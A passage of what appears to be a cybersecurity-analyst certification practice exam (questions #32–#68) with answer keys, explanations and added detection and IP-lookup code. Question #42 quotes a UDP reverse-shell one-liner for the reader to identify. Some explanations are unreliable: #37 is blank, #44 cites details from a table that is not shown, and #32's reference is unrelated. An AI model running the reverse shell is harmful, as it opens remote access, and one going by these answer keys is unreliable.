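# Constructed sample log (not from a real system). The first pair is the
# pattern from the question: an "admin" account created and elevated at once.
SAMPLE_LOG = """
{"ts": "2024-03-01T02:14:05", "host": "WS-017", "event_id": 4720, "subject": "svc_backup", "target": "admin"}
{"ts": "2024-03-01T02:14:09", "host": "WS-017", "event_id": 4732, "subject": "svc_backup", "target": "admin", "group": "Administrators"}
{"ts": "2024-03-01T09:30:00", "host": "WS-022", "event_id": 4720, "subject": "helpdesk1", "target": "jsmith"}
{"ts": "2024-03-01T09:30:30", "host": "WS-022", "event_id": 4732, "subject": "helpdesk1", "target": "jsmith", "group": "Remote Desktop Users"}
{"ts": "2024-03-01T11:00:00", "host": "WS-022", "event_id": 4732, "subject": "helpdesk1", "target": "jsmith", "group": "Administrators"}
"""

if __name__ == "__main__":
    for alert in new_admin_accounts(SAMPLE_LOG):
        print(alert)
```

The jsmith account is not flagged: it was created by the helpdesk, given a non-admin group, and only elevated ninety minutes later, outside the window. The subject field (who performed the action) is what the analyst pivots on next, since a service account creating local administrators at 02:14 is itself suspicious.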

Question #32

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools.

Which of the following best describes what the security program did?

  • A . Data enrichment
  • B . Security control plane
  • C . Threat feed combination
  • D . Single pane of glass

Correct Answer: D

Explanation:

A single pane of glass is a term that describes a unified view or interface that integrates multiple tools or data sources into one dashboard or console. A single pane of glass can help improve security operations by providing visibility, correlation, analysis, and alerting capabilities across various security controls and systems. A single pane of glass can also help reduce complexity, improve efficiency, and enhance decision making for security analysts. In this case, a security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM, which provides a single pane of glass for security operations.

Reference: https://www.eccouncil.org/cybersecurity-exchange/threat-intelligence/cyber-kill-chain-seven-steps-cyberattack

Question #33

Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment.

Given the following output:

Which of the following choices should the analyst look at first?

  • A . wh4dc-748gy.lan (192.168.86.152)
  • B . lan (192.168.86.22)
  • C . imaging.lan (192.168.86.150)
  • D . xlaptop.lan (192.168.86.249)
  • E . p4wnp1_aloa.lan (192.168.86.56)

Correct Answer: E

Explanation:

The analyst should look at p4wnp1_aloa.lan (192.168.86.56) first, as this is the most suspicious device on the network. P4wnP1 ALOA is a tool that can be used to create a malicious USB device that can perform various attacks, such as keystroke injection, network sniffing, man-in-the-middle, or backdoor creation. The presence of a device with this name on the network could indicate that an attacker has plugged in a malicious USB device to a system and gained access to the network.

Reference: https://github.com/mame82/P4wnP1_aloa

Question #34

When starting an investigation, which of the following must be done first?

  • A . Notify law enforcement
  • B . Secure the scene
  • C . Seize all related evidence
  • D . Interview the witnesses

Correct Answer: B

Explanation:

The first thing that must be done when starting an investigation is to secure the scene. Securing the scene involves isolating and protecting the area where the incident occurred, as well as any potential evidence or witnesses. Securing the scene can help prevent any tampering, contamination, or destruction of evidence, as well as any interference or obstruction of the investigation.

Question #35

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

  • A . The lead should review what is documented in the incident response policy or plan
  • B . Management level members of the CSIRT should make that decision
  • C . The lead has the authority to decide who to communicate with at any time
  • D . Subject matter experts on the team should communicate with others within the specified area of expertise

Correct Answer: A

Explanation:

The incident response policy or plan is a document that defines the roles and responsibilities, procedures and processes, communication and escalation protocols, and reporting and documentation requirements for handling security incidents. The lead should review what is documented in the incident response policy or plan to determine who should be communicated with and when during a security incident, as well as what information should be shared and how. The incident response policy or plan should also be aligned with the organizational policies and legal obligations regarding incident notification and disclosure.

Question #36

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization.

Which of the following will produce the data needed for the briefing?

  • A . Firewall logs
  • B . Indicators of compromise
  • C . Risk assessment
  • D . Access control lists

Correct Answer: B

Explanation:

Indicators of compromise (IoCs) are pieces of data or evidence that suggest a system or network has been compromised by an attacker or malware. IoCs can include IP addresses, domain names, URLs, file hashes, registry keys, network traffic patterns, user behaviors, or system anomalies. IoCs can be used to detect, analyze, and respond to security incidents, as well as to share threat intelligence with other organizations or authorities. IoCs can produce the data needed for an executive briefing on possible threats to the organization, as they can provide information on the source, nature, scope, impact, and mitigation of the threats.

Question #37

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country.

Which of the following describes what the analyst has noticed?

  • A . Beaconing
  • B . Cross-site scripting
  • C . Buffer overflow
  • D . PHP traversal

Correct Answer: A

Explanation:

Question #38

A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself.

Which of the following can the analyst perform to see the entire contents of the downloaded files?

  • A . Change the display filter to ftp.active.port
  • B . Change the display filter to tcp.port=20
  • C . Change the display filter to ftp-data and follow the TCP streams
  • D . Navigate to the File menu and select FTP from the Export objects option

Correct Answer: C

Explanation:

The best way to see the entire contents of the downloaded files in Wireshark is to change the display filter to ftp-data and follow the TCP streams. FTP-data is the data channel used to transfer files between an FTP client and server, which in active mode uses TCP port 20, separate from the control channel on port 21 that carries the RETR commands and 226 responses. By filtering for ftp-data packets and following the TCP streams, the analyst can see the actual file data that was transferred during the FTP session.

Question #39

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago, but the report did not have a follow-up remediation response from an analyst.

Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

  • A . SLA
  • B . MOU
  • C . NDA
  • D . Limitation of liability

Correct Answer: A

Explanation:

SLA stands for service level agreement, which is a contract or document that defines the expectations and obligations between a service provider and a customer regarding the quality, availability, performance, or scope of a service. An SLA may also specify the metrics, penalties, or remedies for measuring or ensuring compliance with the agreed service levels. An SLA can help the SOC manager review if the team is meeting the appropriate contractual obligations for the customer, such as response time, resolution time, reporting frequency, or communication channels.

Question #40

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

  • A . Command and control
  • B . Actions on objectives
  • C . Exploitation
  • D . Delivery

Correct Answer: A

Explanation:

Command and control (C2) is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 enables the adversary to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels. C2 allows the adversary to maintain persistence, exfiltrate data, execute commands, deliver payloads, or spread to other systems or networks.

Question #41

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic.

Which of the following would best meet this requirement?

  • A . External
  • B . Agent-based
  • C . Non-credentialed
  • D . Credentialed

Correct Answer: B

Explanation:

Agent-based vulnerability scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console. Agent-based vulnerability scanning can reduce network traffic, as the scans are performed locally and only the results are transmitted over the network. Agent-based vulnerability scanning can also provide more accurate and up-to-date results, as the agents can scan continuously or on-demand, regardless of the system or network status or location.

Question #42

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

Which of the following is being attempted?

  • A . RCE
  • B . Reverse shell
  • C . XSS
  • D . SQL injection

Correct Answer: B

Explanation:

A reverse shell is a type of shell access that allows a remote user to execute commands on a target system or network by reversing the normal direction of communication. A reverse shell is usually created by running a malicious script or program on the target system that connects back to the remote user’s system and opens a shell session. A reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

This command creates a reverse shell connection from the target system to the remote user’s system at IP address 10.1.1.1 and port 4821 over UDP: the interactive shell’s output is redirected to the network socket and its input is read back from it, so the outbound connection carries the attacker’s commands and the shell’s responses. Outbound traffic to an unexpected external address on a non-standard UDP port is the observable that network monitoring can alert on.

Question #43

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware.

Which of the following factors would an analyst most likely communicate as the reason for this escalation?

  • A . Scope
  • B . Weaponization
  • C . CVSS
  • D . Asset value

Correct Answer: B

Explanation:

Weaponization is a factor that describes how an adversary develops or acquires an exploit or payload that can take advantage of a vulnerability and deliver a malicious effect. Weaponization can increase the severity or impact of a vulnerability, as it makes it easier or more likely for an attacker to exploit it successfully and cause damage or harm. Weaponization can also indicate the level of sophistication or motivation of an attacker, as well as the availability or popularity of an exploit or payload in the cyber threat landscape. In this case, an older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. This indicates that weaponization was the reason for this escalation.

Question #44

An analyst is reviewing a vulnerability report for a server environment with the following entries:

Which of the following systems should be prioritized for patching first?

  • A . 10.101.27.98
  • B . 54.73.225.17
  • C . 54.74.110.26
  • D . 54.74.110.228

Correct Answer: D

Explanation:

The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and severity of vulnerabilities among the four systems listed in the vulnerability report. According to the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017-0144 (EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution vulnerabilities that can allow an attacker to compromise the system without any user interaction or authentication. These vulnerabilities pose a high risk to the system and should be patched as soon as possible.

Question #45

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data.

Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

  • A . Credentialed network scanning
  • B . Passive scanning
  • C . Agent-based scanning
  • D . Dynamic scanning

Correct Answer: C

Explanation:

Agent-based scanning is a method that involves installing software agents on the target systems or networks that can perform local scans and report the results to a central server or console. Agent-based scanning can reduce the access to systems, as the agents do not require any credentials or permissions to scan the local system or network. Agent-based scanning can also provide the most accurate vulnerability scan results, as the agents can scan continuously or on-demand, regardless of the system or network status or location.

Question #46

A security analyst is trying to identify anomalies on the network routing.

Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

  • A . function x() { info=$(geoiplookup $1) && echo "$1 | $info"; }
  • B . function x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') && echo "$1 | $info"; }
  • C . function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info"; }
  • D . function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info"; }

Correct Answer: C

Explanation:

The function that can be used on a shell script to identify anomalies on the network routing most accurately is:

function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info"; }

This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup on the IP address; the awk step keeps the reversed-octet name that precedes ".in-addr.arpa" in that output. The second lookup appends that reversed-octet name to the origin.asn.cymru.com domain and requests its TXT record, which returns the autonomous system number (ASN) and other information (BGP prefix, country code, registry, allocation date) related to the IP address. The function then prints the IP address and the ASN information, which can help identify any routing anomalies or inconsistencies, such as an address being announced from an unexpected autonomous system.

Question #47

There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat.

Which of the following security controls would best support the company in this scenario?

  • A . Implement step-up authentication for administrators
  • B . Improve employee training and awareness
  • C . Increase password complexity standards
  • D . Deploy mobile device management

Correct Answer: B

Explanation:

The best security control to implement against sensitive information being disclosed via file sharing services is to improve employee training and awareness. Employee training and awareness can help educate employees on the risks and consequences of using file sharing services for sensitive information, as well as the policies and procedures for handling such information securely and appropriately. Employee training and awareness can also help foster a security culture and encourage employees to report any incidents or violations of information security.

Question #48

Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?

  • A . Determine the sophistication of the audience that the report is meant for
  • B . Include references and sources of information on the first page
  • C . Include a table of contents outlining the entire report
  • D . Decide on the color scheme that will effectively communicate the metrics

Correct Answer: A

Explanation:

The best way to begin preparation for a report titled “What We Learned” regarding a recent incident involving a cybersecurity breach is to determine the sophistication of the audience that the report is meant for. The sophistication of the audience refers to their level of technical knowledge, understanding, or interest in cybersecurity topics. Determining the sophistication of the audience can help tailor the report content, language, tone, and format to suit their needs and expectations. For example, a report for executive management may be more concise, high-level, and business-oriented than a report for technical staff or peers.

Question #49

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers.

Which of the following actions would allow the analyst to achieve the objective?

  • A . Upload the binary to an air gapped sandbox for analysis
  • B . Send the binaries to the antivirus vendor
  • C . Execute the binaries on an environment with internet connectivity
  • D . Query the file hashes using VirusTotal

Correct Answer: A

Explanation:

The best action that would allow the analyst to gather intelligence without disclosing information to the attackers is to upload the binary to an air gapped sandbox for analysis. An air gapped sandbox is an isolated environment that has no connection to any external network or system. Uploading the binary to an air gapped sandbox can prevent any communication or interaction between the binary and the attackers, as well as any potential harm or infection to other systems or networks. An air gapped sandbox can also allow the analyst to safely analyze and observe the behavior, functionality, or characteristics of the binary.

Question #50

Which of the following would help to minimize human engagement and aid in process improvement in security operations?

  • A . OSSTMM
  • B . SIEM
  • C . SOAR
  • D . OWASP

Correct Answer: C

Explanation:

SOAR stands for security orchestration, automation, and response, which is a term that describes a set of tools, technologies, or platforms that can help streamline, standardize, and automate security operations and incident response processes and tasks. SOAR can help minimize human engagement and aid in process improvement in security operations by reducing manual work, human errors, response time, or complexity. SOAR can also help enhance collaboration, coordination, efficiency, or effectiveness of security operations and incident response teams.

Question #51

After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request.

Which of the following risk management principles did the CISO select?

  • A . Avoid
  • B . Transfer
  • C . Accept
  • D . Mitigate

Correct Answer: A

Explanation:

Avoid is a risk management principle that describes the decision or action of not engaging in an activity or accepting a risk that is deemed too high or unacceptable. Avoiding a risk can eliminate the possibility or impact of the risk, as well as the need for any further risk management actions. In this case, the CISO decided the risk score would be too high and refused the software request. This indicates that the CISO selected the avoid principle for risk management.

Question #52

Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

  • A . Identify any improvements or changes in the incident response plan or procedures
  • B . Determine if an internal mistake was made and who did it so they do not repeat the error
  • C . Present all legal evidence collected and turn it over to law enforcement
  • D . Discuss the financial impact of the incident to determine if security controls are well spent

Correct Answer: A

Explanation:

An important aspect that should be included in the lessons-learned step after an incident is to identify any improvements or changes in the incident response plan or procedures. The lessons-learned step is a process that involves reviewing and evaluating the incident response activities and outcomes, as well as identifying and documenting any strengths, weaknesses, gaps, or best practices. Identifying any improvements or changes in the incident response plan or procedures can help enhance the security posture, readiness, or capability of the organization for future incidents.

Question #53

The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals.

Which of the following will best achieve the goal and maximize results?

  • A . Single pane of glass
  • B . Single sign-on
  • C . Data enrichment
  • D . Deduplication

Correct Answer: D

Explanation:

Deduplication is a process that involves removing any duplicate or redundant data or information from a data set or source. Deduplication can help consolidate several threat intelligence feeds by eliminating any overlapping or repeated indicators of compromise (IoCs), alerts, reports, or recommendations. Deduplication can also help reduce the volume and complexity of threat intelligence data, as well as improve its quality, accuracy, or relevance.

Question #54

Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?

  • A . MITRE ATT&CK
  • B . Cyber Kill Chain
  • C . OWASP
  • D . STIX/TAXII

Correct Answer: A

Explanation:

MITRE ATT&CK is a framework and knowledge base that describes the tactics, techniques, and procedures (TTPs) used by various adversaries in cyberattacks. MITRE ATT&CK can help security analysts compare TTPs between different known adversaries of an organization, as well as identify patterns, gaps, or trends in adversary behavior. MITRE ATT&CK can also help security analysts improve threat detection, analysis, and response capabilities, as well as share threat intelligence with other organizations or communities.

Question #55

An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system.

Which of the following steps of the process does this describe?

  • A . Eradication
  • B . Recovery
  • C . Containment
  • D . Preparation

Correct Answer: A

Explanation:

Eradication is a step in the incident response process that involves removing any traces or remnants of the incident from the affected systems or networks, such as malware, backdoors, compromised accounts, or malicious files. Eradication also involves restoring the systems or networks to their normal or secure state, as well as verifying that the incident is completely eliminated and cannot recur. In this case, the analyst is remediating items associated with a recent incident by isolating the vulnerability and actively removing it from the system. This describes the eradication step of the incident response process.

Question #56

Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer’s customers. However, Joe has not resigned or discussed this with his current supervisor yet.

Which of the following would be the best action for the incident response team to recommend?

  • A . Isolate Joe’s PC from the network
  • B . Reimage the PC based on standard operating procedures
  • C . Initiate a remote wipe of Joe’s PC using mobile device management
  • D . Perform no action until HR or legal counsel advises on next steps

Correct Answer: D

Explanation:

The best action for the incident response team to recommend in this scenario is to perform no action until HR or legal counsel advises on next steps. This action can help avoid any potential legal or ethical issues, such as violating employee privacy rights, contractual obligations, or organizational policies. This action can also help ensure that any evidence or information collected from the employee’s system or network is admissible and valid in case of any legal action or dispute. The incident response team should consult with HR or legal counsel before taking any action that may affect the employee’s system or network.

Question #57

The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program.

Which of the following is the best priority based on common attack frameworks?

  • A . Reduce the administrator and privileged access accounts
  • B . Employ a network-based IDS
  • C . Conduct thorough incident response
  • D . Enable SSO to enterprise applications

Correct Answer: A

Explanation:

The best priority based on common attack frameworks for a new program to reduce attack surface risks and threats as part of a zero trust approach is to reduce the administrator and privileged access accounts. Administrator and privileged access accounts are accounts that have elevated permissions or capabilities to perform sensitive or critical tasks on systems or networks, such as installing software, changing configurations, accessing data, or granting access. Reducing the administrator and privileged access accounts can help minimize the attack surface, as it can limit the number of potential targets or entry points for attackers, as well as reduce the impact or damage of an attack if an account is compromised.

Question #58

During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened.

Which of the following actions should the analyst take first?

  • A . Clone the virtual server for forensic analysis
  • B . Log in to the affected server and begin analysis of the logs
  • C . Restore from the last known-good backup to confirm there was no loss of connectivity
  • D . Shut down the affected server immediately

Correct Answer: A

Explanation:

The first action that the analyst should take in this case is to clone the virtual server for forensic analysis. Cloning the virtual server involves creating an exact copy or image of the server’s data and state at a specific point in time. Cloning the virtual server can help preserve and protect any evidence or information related to the security incident, as well as prevent any tampering, contamination, or destruction of evidence. Cloning the virtual server can also allow the analyst to safely analyze and investigate the incident without affecting the original server or its operations.

Question #59

A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well.

Which of the following is the most likely explanation?

  • A . C2 beaconing activity
  • B . Data exfiltration
  • C . Anomalous activity on unexpected ports
  • D . Network host IP address scanning
  • E . A rogue network device

Correct Answer: A

Explanation:

The most likely explanation for this traffic pattern is C2 beaconing activity. C2 stands for command and control, which is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 beaconing activity is a type of network traffic that indicates a compromised system is sending periodic messages or signals to an attacker’s system using various protocols, such as HTTP(S), DNS, ICMP, or UDP. C2 beaconing activity can enable the attacker to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels.

Question #60

New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy.

Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?

  • A . Human resources must email a copy of a user agreement to all new employees
  • B . Supervisors must get verbal confirmation from new employees indicating they have read the user agreement
  • C . All new employees must take a test about the company security policy during the onboarding process
  • D . All new employees must sign a user agreement to acknowledge the company security policy

Correct Answer: D

Explanation:

The best action that the SOC manager can recommend to help ensure new employees are accountable for following the company policy is to require all new employees to sign a user agreement to acknowledge the company security policy. A user agreement is a document that defines the rights and responsibilities of the users regarding the use of the company’s systems, networks, or resources, as well as the consequences of violating the company’s security policy. Signing a user agreement can help ensure new employees are aware of and agree to comply with the company security policy, as well as hold them accountable for any breaches or incidents caused by their actions or inactions.

Question #61

An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft.

Which of the following would be the best threat intelligence source to learn about this new campaign?

  • A . Information sharing organization
  • B . Blogs/forums
  • C . Cybersecurity incident response team
  • D . Deep/dark web

Correct Answer: A

Explanation:

An information sharing organization is a group or network of organizations that share threat intelligence, best practices, or lessons learned related to cybersecurity issues or incidents; for a supplier in a regulated sector such as the defense industrial base this is typically the sector-specific ISAC (Information Sharing and Analysis Center). An information sharing organization can help security analysts learn about new ransomware campaigns or other emerging threats, including whether peers in the same supply chain have already been targeted, as well as get recommendations or guidance on how to prevent, detect, or respond to them. Blogs and forums (B) and the deep/dark web (D) are unvetted and noisy, and the company's own incident response team (C) only knows about what has already hit the company.

Question #62

An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned.

Which of the following is the most likely reason to include lessons learned?

  • A . To satisfy regulatory requirements for incident reporting
  • B . To hold other departments accountable
  • C . To identify areas of improvement in the incident response process
  • D . To highlight the notable practices of the organization’s incident response team

Correct Answer: C

Explanation:

The most likely reason to include lessons learned in an after-action report is to identify areas of improvement in the incident response process. The lessons learned process is a way of reviewing and evaluating the incident response activities and outcomes, as well as identifying and documenting any strengths, weaknesses, gaps, or best practices. Identifying areas of improvement in the incident response process can help enhance the security posture, readiness, or capability of the organization for future incidents, as well as provide feedback or recommendations on how to address any issues or challenges.

Question #63

A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans.

Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:

Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority.

Which of the following vulnerabilities should be patched first, given the above third-party scoring system?

  • A . InLoud:
    Cobain: Yes
    Grohl: No
    Novo: Yes
    Smear: Yes
    Channing: No
  • B . TSpirit:
    Cobain: Yes
    Grohl: Yes
    Novo: Yes
    Smear: No
    Channing: No
  • C . ENameless:
    Cobain: Yes
    Grohl: No
    Novo: Yes
    Smear: No
    Channing: No
  • D . PBleach:
    Cobain: Yes
    Grohl: No
    Novo: No
    Smear: No
    Channing: Yes

Correct Answer: B

Explanation:

TSpirit (option B) should be patched first:

TSpirit: Cobain: Yes Grohl: Yes Novo: Yes Smear: No Channing: No

It is the only finding with all three higher-priority metrics, Cobain, Grohl and Novo, marked Yes. InLoud and ENameless match on Cobain and Novo only, and PBleach on Cobain only. Because the team has ranked Smear and Channing below the other metrics, the Yes values those two carry for InLoud and PBleach do not lift them above a finding that scores on every high-priority metric.
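An added example, not from the page, of the same ranking carried out in code so that the weighting the team chose is explicit rather than implied. The four findings are the question's options; the weights are an assumption that gives Cobain, Grohl and Novo three points each and Smear and Channing one.

```python
# Added example: ranking findings under a yes/no metric scheme like the third-party
# system in Question 63. Metric names and findings come from the question's options;
# the weights are an assumption encoding "Smear and Channing are lower priority".
WEIGHTS = {"Cobain": 3, "Grohl": 3, "Novo": 3, "Smear": 1, "Channing": 1}

FINDINGS = {
    "InLoud":    {"Cobain": True,  "Grohl": False, "Novo": True,  "Smear": True,  "Channing": False},
    "TSpirit":   {"Cobain": True,  "Grohl": True,  "Novo": True,  "Smear": False, "Channing": False},
    "ENameless": {"Cobain": True,  "Grohl": False, "Novo": True,  "Smear": False, "Channing": False},
    "PBleach":   {"Cobain": True,  "Grohl": False, "Novo": False, "Smear": False, "Channing": True},
}

def score(metrics, weights=WEIGHTS):
    """Weighted count of metrics flagged Yes. Unknown metric names raise instead of silently scoring 0."""
    unknown = set(metrics) - set(weights)
    if unknown:
        raise ValueError(f"unknown metrics: {sorted(unknown)}")
    return sum(weights[m] for m, flagged in metrics.items() if flagged)

def prioritize(findings, weights=WEIGHTS):
    """Return [(name, score)] highest first; ties are broken by name so the order is reproducible."""
    ranked = sorted(findings.items(), key=lambda kv: (-score(kv[1], weights), kv[0]))
    return [(name, score(m, weights)) for name, m in ranked]

if __name__ == "__main__":
    for name, s in prioritize(FINDINGS):
        print(f"{s:2d}  {name}")
```

With these weights InLoud (7) outranks ENameless (6) only because of Smear: a deprioritized metric still acts as a tie-breaker among findings that are equal on the important ones. That is usually what a team wants, but it should be a deliberate choice rather than an accident of the weights.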

Question #64

A user downloads software that contains malware onto a computer that eventually infects numerous other systems.

Which of the following has the user become?

  • A . Hacktivist
  • B . Advanced persistent threat
  • C . Insider threat
  • D . Script kiddie

Correct Answer: C

Explanation:

The user has become an insider threat by downloading software that contains malware onto a computer that eventually infects numerous other systems. An insider threat is a person or entity that has legitimate access to an organization's systems, networks, or resources and uses that access, deliberately or not, to cause harm or damage to the organization. An insider threat can be intentional or unintentional, malicious or negligent, and can result from actions such as downloading unauthorized software, violating security policies, stealing data, sabotaging systems, or collaborating with external attackers. Here the user is a negligent (unintentional) insider: the damage came from legitimate access misused without malicious intent, which is why none of the external-actor categories (hacktivist, advanced persistent threat, script kiddie) apply.

Question #65

An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network.

Which of the following should the CSIRT conduct next?

  • A . Take a snapshot of the compromised server and verify its integrity
  • B . Restore the affected server to remove any malware
  • C . Contact the appropriate government agency to investigate
  • D . Research the malware strain to perform attribution

Correct Answer: A

Explanation:

The next action the CSIRT should conduct after isolating the compromised server from the network is to take a snapshot of it and verify the snapshot's integrity. Taking a snapshot of a virtual server captures an exact copy of its disk and memory state at a specific point in time; verifying its integrity, in practice by computing a cryptographic hash of the snapshot and recording it, ensures that the copy is not altered, corrupted, or tampered with during or after its creation. Doing this first preserves the evidence before any eradication or recovery step changes it. Restoring the server (B) would destroy that evidence, and attribution research (D) or contacting a government agency (C) come later, once the evidence is secured.

Question #66

During an incident, an analyst needs to acquire evidence for later investigation.

Which of the following must be collected first in a computer system, related to its volatility level?

  • A . Disk contents
  • B . Backup data
  • C . Temporary files
  • D . Running processes

Correct Answer: D

Explanation:

The most volatile evidence in a computer system, and therefore the first to collect, is the state of running processes. Process state lives in RAM and changes continuously: it is lost entirely when the system is shut down, rebooted or crashes, and it can be altered or terminated by other processes or users in the meantime. Temporary files, disk contents and backup data persist across a reboot and can be imaged afterwards, so in the order of volatility they come after the memory-resident evidence.

Question #67

A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region.

Which of the following shell script functions could help achieve the goal?

  • A . function w() { a=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $a"; }
  • B . function x() { b=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b"; }
  • C . function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short; }
  • D . function z() { c=$(geoiplookup $1) && echo "$1 | $c"; }

Correct Answer: C

Explanation:

The shell script function that could help identify possible network addresses from different source networks belonging to the same company and region is:

function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short; }

This function takes an IP address as an argument and performs two dig lookups. The first, dig -x, issues a reverse (PTR) query; the grep/tail/awk pipeline does not use the hostname returned but the query name itself, cutting off everything from .in-addr.arpa onward to leave the address with its octets reversed (for 192.0.2.10 the result is 10.2.0.192). The second lookup appends .origin.asn.cymru.com to that reversed address and requests the TXT record, which the Team Cymru IP-to-ASN service answers with the autonomous system number, the announced prefix, the country code, the registry and the allocation date, separated by "|". Addresses that return the same ASN, or the same prefix and country code, belong to the same network operator and region, which is what the analyst is trying to establish. The ping and traceroute options (A and B) only report reachability and hop counts, and geoiplookup (D) reports a country but says nothing about which organization owns the address.

Question #68

A security analyst is writing a shell script to identify IP addresses from the same country.

Which of the following functions would help the analyst achieve the objective?

  • A . function w() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $1}') && echo "$1 | $info"; }
  • B . function x() { info=$(geoiplookup $1) && echo "$1 | $info"; }
  • C . function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo "$1 | $info"; }
  • D . function z() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info"; }

Correct Answer: B

Explanation:

The function that would help the analyst identify IP addresses from the same country is:

function x() { info=$(geoiplookup $1) && echo "$1 | $info"; }

This function takes an IP address as an argument and uses the geoiplookup command to query the local GeoIP database for the location associated with the address. With the country edition of the database the output is a single line of the form "GeoIP Country Edition: US, United States"; city editions add region, city and coordinates. The function prints the IP address next to that information, so the output for a list of addresses can be grouped by country code. A reverse DNS lookup (C) may reveal a hostname but not reliably a country, and ping or traceroute (A and D) measure reachability, not location.
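The two shell functions above hand the analyst raw strings; what makes them useful is parsing the answers and grouping addresses. The following is an added example, not code from the page or from the CySA+ material, that serves both Question 67 and Question 68: it builds the Team Cymru query name the way option C of Question 67 does, parses the TXT answer and the geoiplookup line from Question 68, and groups addresses by ASN and by country. The DNS and GeoIP answers are constructed inline (documentation address ranges and a private-use ASN) so the code runs without network access.

```python
import re
from collections import defaultdict

# Added example, not from the page. Answers below are constructed stand-ins for live lookups.

def cymru_query_name(ip):
    """Team Cymru IP-to-ASN query name: octets reversed plus .origin.asn.cymru.com.
    This is what the dig -x | grep | awk pipeline in Question 67 extracts from the PTR query name."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
        raise ValueError(f"not an IPv4 address: {ip}")
    return ".".join(reversed(octets)) + ".origin.asn.cymru.com"

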